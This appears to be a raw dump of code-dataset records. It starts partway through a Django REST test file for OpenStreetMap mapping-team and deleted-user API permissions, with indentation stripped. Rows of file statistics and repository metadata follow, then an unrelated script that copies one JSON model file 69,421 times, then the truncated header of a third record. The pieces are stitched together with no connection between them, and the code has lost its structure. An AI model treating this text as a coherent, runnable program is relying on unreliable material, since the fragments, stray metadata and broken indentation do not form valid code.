self.assertEqual(MappingTeam.objects.count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.get('results')), 1)
self.assertTrue("name" in response.json().get('results')[0].keys())
self.assertTrue("users" in response.json().get('results')[0].keys())
self.assertTrue("trusted" in response.json().get('results')[0].keys())
def test_filters(self):
self.client.login(username='test', password='password')
self.client.post(self.url, data=self.payload)
response = self.client.get(self.url, {'trusted': 'true'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 0)
response = self.client.get(self.url, {'trusted': 'false'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 1)
response = self.client.get(self.url, {'name': 'Map Company'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 1)
response = self.client.get(self.url, {'name': 'Map'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 1)
response = self.client.get(self.url, {'name': 'Other'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 0)
response = self.client.get(self.url, {'owner': 'test'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 1)
response = self.client.get(self.url, {'owner': 'other user'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 0)
response = self.client.get(self.url, {'owner': 'Test'})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('count'), 0)
class TestMappingTeamDetailAPIView(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test',
password='password',
email='a@a.com'
)
self.social_auth = UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.payload = {
"name": "Map Company",
"users": [
{
"username" : "test_1",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "989",
"dol" : ""
},
{
"username" : "test_2",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "987",
"dol" : ""
}
],
"trusted": True
}
self.team = MappingTeam.objects.create(
name="Group of Users",
users=self.payload,
created_by=self.user
)
def test_unauthenticated(self):
url = reverse('users:mapping-team-detail', args=[self.team.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 401)
response = self.client.put(url, data=self.payload)
self.assertEqual(response.status_code, 401)
response = self.client.patch(url, data=self.payload)
self.assertEqual(response.status_code, 401)
response = self.client.delete(url)
self.assertEqual(response.status_code, 401)
def test_with_owner(self):
url = reverse('users:mapping-team-detail', args=[self.team.id])
self.client.login(username='test', password='password')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
response = self.client.put(url, data=self.payload)
self.assertEqual(response.status_code, 200)
response = self.client.patch(url, data=self.payload)
self.assertEqual(response.status_code, 200)
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
self.assertEqual(MappingTeam.objects.count(), 0)
def test_with_staff_user(self):
user = User.objects.create_user(
username='staff_user',
password='password',
email='a@a.com',
is_staff=True
)
url = reverse('users:mapping-team-detail', args=[self.team.id])
self.client.login(username='staff_user', password='password')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
response = self.client.put(url, data=self.payload)
self.assertEqual(response.status_code, 200)
response = self.client.patch(url, data=self.payload)
self.assertEqual(response.status_code, 200)
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
def test_with_other_user(self):
user = User.objects.create_user(
username='test_2',
password='password',
email='a@a.com'
)
url = reverse('users:mapping-team-detail', args=[self.team.id])
self.client.login(username='test_2', password='password')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
response = self.client.put(url, data=self.payload)
self.assertEqual(response.status_code, 403)
response = self.client.patch(url, data=self.payload)
self.assertEqual(response.status_code, 403)
response = self.client.delete(url)
self.assertEqual(response.status_code, 403)
class TestMappingTeamTrustingAPIView(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test',
password='password',
email='a@a.com'
)
self.social_auth = UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.payload = {
"name": "Map Company",
"users": [
{
"username" : "test_1",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "989",
"dol" : ""
},
{
"username" : "test_2",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "987",
"dol" : ""
}
],
"trusted": True
}
self.team = MappingTeam.objects.create(
name="Group of Users",
users=self.payload,
created_by=self.user
)
def test_unauthenticated(self):
url = reverse('users:trust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 401)
url = reverse('users:untrust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 401)
def test_with_owner(self):
url = reverse('users:trust-mapping-team', args=[self.team.id])
self.client.login(username='test', password='password')
response = self.client.put(url)
self.assertEqual(response.status_code, 403)
url = reverse('users:untrust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 403)
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
def test_with_staff_user(self):
user = User.objects.create_user(
username='staff_user',
password='password',
email='a@a.com',
is_staff=True
)
url = reverse('users:trust-mapping-team', args=[self.team.id])
self.client.login(username='staff_user', password='password')
response = self.client.put(url)
self.assertEqual(response.status_code, 200)
self.team.refresh_from_db()
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 0)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 1)
url = reverse('users:untrust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 200)
self.team.refresh_from_db()
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
def test_with_other_user(self):
user = User.objects.create_user(
username='test_2',
password='password',
email='a@a.com'
)
self.client.login(username='test_2', password='password')
url = reverse('users:trust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 403)
url = reverse('users:untrust-mapping-team', args=[self.team.id])
response = self.client.put(url)
self.assertEqual(response.status_code, 403)
self.assertEqual(MappingTeam.objects.filter(trusted=False).count(), 1)
self.assertEqual(MappingTeam.objects.filter(trusted=True).count(), 0)
self.staff_user = User.objects.create_user(
username='staff',
password='password',
email='a@a.com',
is_staff=True
)
UserSocialAuth.objects.create(
user=self.staff_user,
provider='openstreetmap',
uid='123456',
)
class TestUpdateDeletedUsersView(APITestCase):
def setUp(self):
self.url = reverse('users:update-deleted-users')
ChangesetFactory.create_batch(50, uid="1769", user="test_user")
ChangesetFactory.create_batch(50, uid="1234", user="old_user")
self.user = User.objects.create_user(
username='test',
password='password',
email='a@a.com'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.staff_user = User.objects.create_user(
username='staff',
password='password',
email='a@a.com',
is_staff=True
)
UserSocialAuth.objects.create(
user=self.staff_user,
provider='openstreetmap',
uid='123456',
)
def test_unauthenticated(self):
request = self.client.post(self.url, data={'uids': [1769, 1234]})
self.assertEqual(request.status_code, 401)
def test_non_staff_user(self):
self.client.login(username=self.user.username, password='password')
request = self.client.post(self.url, data={'uids': [1769, 1234]})
self.assertEqual(request.status_code, 403)
def test_bad_request(self):
self.client.login(username=self.staff_user.username, password='password')
request = self.client.post(self.url)
self.assertEqual(request.status_code, 400)
request = self.client.post(self.url, data={'uid': [1769, 1234]})
self.assertEqual(request.status_code, 400)
def test_view(self):
user = User.objects.create_user(
username='test_user',
password='password',
email='a@a.com'
)
UserSocialAuth.objects.create(
user=user,
provider='openstreetmap',
uid='1769',
)
user_2 = User.objects.create_user(
username='old_user',
password='password',
email='a@a.com'
)
UserSocialAuth.objects.create(
user=user_2,
provider='openstreetmap',
uid='1234',
)
self.client.login(username=self.staff_user.username, password='password')
request = self.client.post(self.url, data={'uids': [1769, 1234]})
self.assertEqual(request.status_code, 200)
self.assertEqual(Changeset.objects.filter(uid='1769').count(), 50)
self.assertEqual(Changeset.objects.filter(user='user_1769').count(), 50)
self.assertEqual(Changeset.objects.filter(user='test_user').count(), 0)
self.assertEqual(Changeset.objects.filter(uid='1234').count(), 50)
self.assertEqual(Changeset.objects.filter(user='user_1234').count(), 50)
self.assertEqual(Changeset.objects.filter(user='old_user').count(), 0)
self.assertEqual(User.objects.filter(username='old_user').count(), 0)
self.assertEqual(User.objects.filter(username='test_user').count(), 0)
self.assertEqual(User.objects.filter(username='user_1234').count(), 1)
self.assertEqual(User.objects.filter(username='user_1769').count(), 1)
def test_view_as_strings(self):
self.client.login(username=self.staff_user.username, password='password')
request = self.client.post(self.url, data={'uids': ['1769', '1234']})
self.assertEqual(request.status_code, 200)
self.assertEqual(Changeset.objects.filter(uid='1769').count(), 50)
self.assertEqual(Changeset.objects.filter(user='user_1769').count(), 50)
self.assertEqual(Changeset.objects.filter(user='test_user').count(), 0)
self.assertEqual(Changeset.objects.filter(uid='1234').count(), 50)
self.assertEqual(Changeset.objects.filter(user='user_1234').count(), 50)
self.assertEqual(Changeset.objects.filter(user='old_user').count(), 0)
| 38.942688
| 82
| 0.596245
| 2,173
| 19,705
| 5.318914
| 0.072711
| 0.133674
| 0.131338
| 0.105382
| 0.891158
| 0.859145
| 0.832497
| 0.799706
| 0.768472
| 0.74416
| 0
| 0.031705
| 0.265313
| 19,705
| 505
| 83
| 39.019802
| 0.766664
| 0
| 0
| 0.672727
| 0
| 0
| 0.113981
| 0.016544
| 0
| 0
| 0
| 0
| 0.254545
| 1
| 0.065909
| false
| 0.070455
| 0.013636
| 0
| 0.093182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3f8f6de8fd2d63c911589b035d7ba54d95814173
| 358
|
py
|
Python
|
src/main/resources/assets/tiny_tintato/models/item/duplicate.py
|
hYdos/heresYourCopperCoppa
|
ff7c49cb13fe1f32d8f8029b96b18282daf7aad0
|
[
"CC0-1.0"
] | null | null | null |
src/main/resources/assets/tiny_tintato/models/item/duplicate.py
|
hYdos/heresYourCopperCoppa
|
ff7c49cb13fe1f32d8f8029b96b18282daf7aad0
|
[
"CC0-1.0"
] | null | null | null |
src/main/resources/assets/tiny_tintato/models/item/duplicate.py
|
hYdos/heresYourCopperCoppa
|
ff7c49cb13fe1f32d8f8029b96b18282daf7aad0
|
[
"CC0-1.0"
] | null | null | null |
from shutil import copyfile
i = 0
while (i != 69421):
src = "/home/hayden/Documents/Projects/heresYourCopperCoppa/src/main/resources/assets/tiny_tintato/models/item/tin_.json"
dst = "/home/hayden/Documents/Projects/heresYourCopperCoppa/src/main/resources/assets/tiny_tintato/models/item/tin_" + str(i) + ".json"
copyfile(src, dst)
i = i + 1
| 39.777778
| 139
| 0.731844
| 49
| 358
| 5.265306
| 0.530612
| 0.077519
| 0.147287
| 0.209302
| 0.72093
| 0.72093
| 0.72093
| 0.72093
| 0.72093
| 0.72093
| 0
| 0.022364
| 0.125698
| 358
| 8
| 140
| 44.75
| 0.801917
| 0
| 0
| 0
| 0
| 0.285714
| 0.631285
| 0.617318
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3fe2132a3833de52a458263d715fbd0abb2130b4
| 3,241
|
py
|
Python
|
pentestui/pentest_api/serializers.py
|
mustgundogdu/PentestUI
|
92263ea73bd2eaa2081fb277c76aa229103a1d54
|
[
"Apache-2.0"
] | 21
|
2021-07-26T05:19:45.000Z
|
2022-02-01T07:35:21.000Z
|
pentestui/pentest_api/serializers.py
|
mustgundogdu/PentestUI
|
92263ea73bd2eaa2081fb277c76aa229103a1d54
|
[
"Apache-2.0"
] | null | null | null |
pentestui/pentest_api/serializers.py
|
mustgundogdu/PentestUI
|
92263ea73bd2eaa2081fb277c76aa229103a1d54
|
[
"Apache-2.0"
] | 2
|
2021-09-21T06:52:10.000Z
|
2021-09-26T07:31:27.000Z
|
from rest_framework import serializers
class SpnEnumSerializer(serializers.Serializer):
"""Serializes a name field for testing our APIView """
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
class DomainAdminsSerializer(serializers.Serializer):
"""Srializes a name field for Our Group Member API View"""
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
class DfsharesSerializer(serializers.Serializer):
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
class DomainControllersSerializer(serializers.Serializer):
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
class SensitiveDataSerializer(serializers.Serializer):
""" Sensitive data Search Serializer"""
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
Search_Data = serializers.CharField(max_length=75)
class DnsZoneSerializer(serializers.Serializer):
"""Serializes a name field for testing our APIView """
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
class PreAuthUserSerializer(serializers.Serializer):
"""Serializes a name field for testing Our APIView """
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
class PasswordSpraySerializer(serializers.Serializer):
""" password Spray Serializer"""
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
Spray_Password = serializers.CharField(max_length=90)
class AsrepRoastingSerializer(serializers.Serializer):
""" Asrep-Roasting Attack Serializer """
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
class KerberoastinSerializer(serializers.Serializer):
""" Kerberoasting Attack Serializer """
Server_Ip = serializers.CharField(max_length=20)
Domain_Name = serializers.CharField(max_length=50)
User_Name = serializers.CharField(max_length=30)
Password = serializers.CharField(max_length=35)
| 43.797297
| 62
| 0.777538
| 377
| 3,241
| 6.485411
| 0.137931
| 0.343558
| 0.395092
| 0.49816
| 0.788957
| 0.773824
| 0.773824
| 0.773824
| 0.773824
| 0.773824
| 0
| 0.029798
| 0.130207
| 3,241
| 73
| 63
| 44.39726
| 0.837531
| 0.099969
| 0
| 0.754717
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.226415
| 0.018868
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 11
|
b75c06f8d378320761db133540ce803b8ed6fd94
| 13,175
|
py
|
Python
|
animations/yellow-screamy.py
|
SteffiPeTaffy/draw
|
b8a31a42a8b5c5bf8ab2c33ce1c58d82ff1e97df
|
[
"Unlicense"
] | 2
|
2021-02-07T17:07:42.000Z
|
2021-02-13T18:17:49.000Z
|
animations/yellow-screamy.py
|
SteffiPeTaffy/draw
|
b8a31a42a8b5c5bf8ab2c33ce1c58d82ff1e97df
|
[
"Unlicense"
] | null | null | null |
animations/yellow-screamy.py
|
SteffiPeTaffy/draw
|
b8a31a42a8b5c5bf8ab2c33ce1c58d82ff1e97df
|
[
"Unlicense"
] | null | null | null |
import paho.mqtt.client as mqtt
import time
broker_address = 'broker.emqx.io'
broker_port = 1883
client = mqtt.Client('SteffiPeTaffy')
client.connect(broker_address, broker_port)
topic = "lieblingswelt/draw"
yellow = [254, 254, 84]
black = [0, 0, 0]
white = [254, 254, 254]
red = [254, 0, 0]
face = [
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, black, black, black, black, black, yellow, yellow, yellow, yellow, black, black, black, black, black,
yellow],
[black, white, white, white, white, white, black, yellow, yellow, black, white, white, white, white, white, black],
[black, white, white, black, white, white, black, yellow, yellow, black, white, white, black, white, white, black],
[black, white, white, black, white, white, black, yellow, yellow, black, white, white, black, white, white, black],
[black, white, white, white, white, white, black, yellow, yellow, black, white, white, white, white, white, black],
[yellow, black, black, black, black, black, yellow, yellow, yellow, yellow, black, black, black, black, black,
yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow],
[yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow, yellow,
yellow, yellow]
]
for x in range(16):
for y in range(16):
colour = face[x][y]
message = [y, x, colour[0], colour[1], colour[2]]
client.publish(topic, bytearray(message))
time.sleep(0.2)
for i in range(5):
# from mid to right
client.publish(topic, bytearray([3, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([3, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([4, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 5, black[0], black[1], black[2]]))
client.publish(topic, bytearray([12, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([12, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([13, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([13, 5, black[0], black[1], black[2]]))
time.sleep(2)
# from right to mid
client.publish(topic, bytearray([4, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([4, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([3, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([3, 5, black[0], black[1], black[2]]))
client.publish(topic, bytearray([13, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([13, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([12, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([12, 5, black[0], black[1], black[2]]))
time.sleep(2)
# from mid to left
client.publish(topic, bytearray([3, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([3, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([2, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([2, 5, black[0], black[1], black[2]]))
client.publish(topic, bytearray([12, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([12, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([11, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([11, 5, black[0], black[1], black[2]]))
time.sleep(2)
# from left to mid
client.publish(topic, bytearray([2, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([2, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([3, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([3, 5, black[0], black[1], black[2]]))
client.publish(topic, bytearray([11, 4, white[0], white[1], white[2]]))
client.publish(topic, bytearray([11, 5, white[0], white[1], white[2]]))
client.publish(topic, bytearray([12, 4, black[0], black[1], black[2]]))
client.publish(topic, bytearray([12, 5, black[0], black[1], black[2]]))
time.sleep(2)
# closed mouth
client.publish(topic, bytearray([3, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([5, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([6, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([7, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([8, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([9, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([10, 13, black[0], black[1], black[2]]))
client.publish(topic, bytearray([11, 13, black[0], black[1], black[2]]))
time.sleep(1)
# slightly opened mouth
client.publish(topic, bytearray([3, 12, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([5, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([6, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([7, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([8, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([9, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([10, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([11, 12, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([5, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([6, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([7, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([8, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([9, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([10, 11, black[0], black[1], black[2]]))
time.sleep(1)
# fully opened mouth
client.publish(topic, bytearray([3, 12, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([5, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([6, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([7, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([8, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([9, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([10, 12, red[0], red[1], red[2]]))
client.publish(topic, bytearray([11, 12, black[0], black[1], black[2]]))
client.publish(topic, bytearray([3, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 11, red[0], red[1], red[2]]))
client.publish(topic, bytearray([5, 11, red[0], red[1], red[2]]))
client.publish(topic, bytearray([6, 11, red[0], red[1], red[2]]))
client.publish(topic, bytearray([7, 11, red[0], red[1], red[2]]))
client.publish(topic, bytearray([8, 11, red[0], red[1], red[2]]))
client.publish(topic, bytearray([9, 11, red[0], red[1], red[2]]))
client.publish(topic, bytearray([10, 11, red[0], red[1], red[2]]))
client.publish(topic, bytearray([11, 11, black[0], black[1], black[2]]))
client.publish(topic, bytearray([3, 10, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 10, red[0], red[1], red[2]]))
client.publish(topic, bytearray([5, 10, red[0], red[1], red[2]]))
client.publish(topic, bytearray([6, 10, red[0], red[1], red[2]]))
client.publish(topic, bytearray([7, 10, red[0], red[1], red[2]]))
client.publish(topic, bytearray([8, 10, red[0], red[1], red[2]]))
client.publish(topic, bytearray([9, 10, red[0], red[1], red[2]]))
client.publish(topic, bytearray([10, 10, red[0], red[1], red[2]]))
client.publish(topic, bytearray([11, 10, black[0], black[1], black[2]]))
client.publish(topic, bytearray([4, 9, black[0], black[1], black[2]]))
client.publish(topic, bytearray([5, 9, black[0], black[1], black[2]]))
client.publish(topic, bytearray([6, 9, black[0], black[1], black[2]]))
client.publish(topic, bytearray([7, 9, black[0], black[1], black[2]]))
client.publish(topic, bytearray([8, 9, black[0], black[1], black[2]]))
client.publish(topic, bytearray([9, 9, black[0], black[1], black[2]]))
client.publish(topic, bytearray([10, 9, black[0], black[1], black[2]]))
time.sleep(2)
# no mouth
client.publish(topic, bytearray([3, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([4, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([5, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([6, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([7, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([8, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([9, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([10, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([11, 12, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([3, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([4, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([5, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([6, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([7, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([8, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([9, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([10, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([11, 11, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([3, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([4, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([5, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([6, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([7, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([8, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([9, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([10, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([11, 10, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([4, 9, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([5, 9, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([6, 9, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([7, 9, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([8, 9, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([9, 9, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([10, 9, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([3, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([4, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([5, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([6, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([7, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([8, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([9, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([10, 13, yellow[0], yellow[1], yellow[2]]))
client.publish(topic, bytearray([11, 13, yellow[0], yellow[1], yellow[2]]))
time.sleep(1)
client.disconnect()
print('done!')
| 58.039648
| 119
| 0.637192
| 2,001
| 13,175
| 4.193403
| 0.031984
| 0.243118
| 0.347515
| 0.451913
| 0.952926
| 0.949589
| 0.93779
| 0.930402
| 0.930402
| 0.920391
| 0
| 0.075071
| 0.148691
| 13,175
| 226
| 120
| 58.29646
| 0.673056
| 0.010019
| 0
| 0.359375
| 0
| 0
| 0.003836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010417
| 0
| 0.010417
| 0.005208
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b7ab36ee5d58bed03c58fbfddefdc68cafa579fe
| 132
|
py
|
Python
|
main.py
|
rapkin/osm-quarantine-eat-out
|
9741458f118cac289479a110ae8abbeabb7deb55
|
[
"MIT"
] | 1
|
2020-05-16T15:57:58.000Z
|
2020-05-16T15:57:58.000Z
|
main.py
|
rapkin/osm-quarantine-eat-out
|
9741458f118cac289479a110ae8abbeabb7deb55
|
[
"MIT"
] | null | null | null |
main.py
|
rapkin/osm-quarantine-eat-out
|
